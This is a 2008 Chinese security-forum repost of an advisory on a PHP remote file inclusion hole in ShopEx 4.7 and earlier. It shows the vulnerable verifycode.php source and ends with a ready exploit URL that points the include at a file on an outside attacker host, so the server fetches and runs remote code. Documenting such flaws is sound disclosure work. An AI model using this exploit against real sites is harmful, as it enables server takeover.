[转载]ShopEx PHP远程包含漏洞

寂寞宝贝

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 421
精华: 12
积分: 4636
阅读权限: 100
性别: 男
来自: 云南
在线时间: 171 小时
注册时间: 2006-2-7
最后登录: 2008-5-16

发短消息
加为好友
当前离线

楼主大中小发表于 2008-3-17 11:11 只看该作者

[转载]ShopEx PHP远程包含漏洞

文章作者：寂寞hacker
信息来源：http://hi.baidu.com/isbx/

影响版本：4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <develop@shopex.cn>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
}
/* 调用 session 文件 */
include_once($INC_SYSHOMEDIR."include/session.inc.php");

mt_srand((double)microtime() * 1000000);
/* 生成验证码 */
$strValidate = mt_rand(1000, 9999);
session_unregister("RANDOM_CODE");
session_register("RANDOM_CODE");
$_SESSION["RANDOM_CODE"] = $strValidate."";
$verifyImg = newclass("verifyCode", $strValidate);

/* 输出验证码图片 */
$verifyImg->Output();
?>

Exp: shop/verifycode.php?INC_SYSHOMEDIR=http://www.ynhacker.com/conn.txt?

成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » [转载]ShopEx PHP远程包含漏洞